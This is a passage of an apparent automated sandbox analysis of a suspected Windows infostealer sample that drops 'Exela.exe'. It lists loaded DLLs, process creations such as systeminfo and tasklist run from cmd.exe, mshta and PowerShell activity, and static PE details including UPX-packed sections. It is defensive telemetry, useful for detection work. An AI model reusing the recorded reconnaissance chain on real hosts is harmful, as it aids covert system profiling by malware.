            Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: mswsock.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: napinsp.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: pnrpnsp.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: wshbth.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: nlaapi.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: iphlpapi.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: dnsapi.dll
            Source: C:\Windows\System32\HOSTNAME.EXESection loaded: winrnr.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cscapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\query.exeSection loaded: regapi.dll
            Source: C:\Windows\System32\quser.exeSection loaded: winsta.dll
            Source: C:\Windows\System32\quser.exeSection loaded: utildll.dll
            Source: C:\Windows\System32\quser.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\quser.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cscapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
            Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
            Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\net1.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeStatic file information: File size 11317024 > 1048576
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: crypto\engine\tb_digest.cENGINE_get_digestcrypto\buffer\buffer.cBUF_MEM_growBUF_MEM_grow_cleancrypto\packet.ccompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specific.dllCPUINFO: crypto\initthread.cOPENSSL_ia32cap source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003420709.00007FFDFA701000.00000040.00000001.01000000.0000001E.sdmp
            Source: Binary string: tRSA_PRIME_INFOeqdmp1dmq1iqmpprime_infosRSAPrivateKeyRSAPublicKeyhashAlgorithmmaskGenAlgorithmsaltLengthtrailerFieldRSA_PSS_PARAMShashFuncmaskGenFuncpSourceFuncRSA_OAEP_PARAMScompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"3.2.1built on: Fri Feb 23 00:13:44 2024 UTCplatform: VC-WIN64AOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availablecrypto\init.cOPENSSL_init_cryptocrypto\bio\bio_lib.cBIO_new_exbio_read_internbio_write_internBIO_sendmmsgBIO_recvmmsgBIO_putsBIO_getsBIO_get_line BIO_ctrlBIO_callback_ctrlBIO_find_type source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003420709.00007FFDFA701000.00000040.00000001.01000000.0000001E.sdmp
            Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pip-req-build-csg7dlje\src\rust\target\release\deps\cryptography_rust.pdb source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003420709.00007FFDFA701000.00000040.00000001.01000000.0000001E.sdmp
            Source: Binary string: D:\_w\1\b\bin\amd64\python3.pdb source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657012917.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1986952157.000002DCCEDE0000.00000002.00000001.01000000.00000006.sdmp, Exela.exe, 00000051.00000003.1831588046.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1650799388.000001FC75802000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1803607087.0000023B784A2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\runneradmin\AppData\Local\Temp\pip-req-build-csg7dlje\src\rust\target\release\deps\cryptography_rust.pdbo source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003420709.00007FFDFA701000.00000040.00000001.01000000.0000001E.sdmp
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003420709.00007FFDFA701000.00000040.00000001.01000000.0000001E.sdmp
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: VCRUNTIME140.dll.0.drStatic PE information: 0xEFFF39AD [Sun Aug 4 18:57:49 2097 UTC]
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeStatic PE information: section name: _RDATA
            Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
            Source: libffi-8.dll.0.drStatic PE information: section name: UPX2
            Source: _rust.pyd.0.drStatic PE information: section name: UPX2
            Source: Exela.exe.1.drStatic PE information: section name: _RDATA
            Source: VCRUNTIME140.dll.81.drStatic PE information: section name: _RDATA
            Source: libffi-8.dll.81.drStatic PE information: section name: UPX2
            Source: _rust.pyd.81.drStatic PE information: section name: UPX2
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
            Source: initial sampleStatic PE information: section name: UPX1
            Source: initial sampleStatic PE information: section name: UPX0
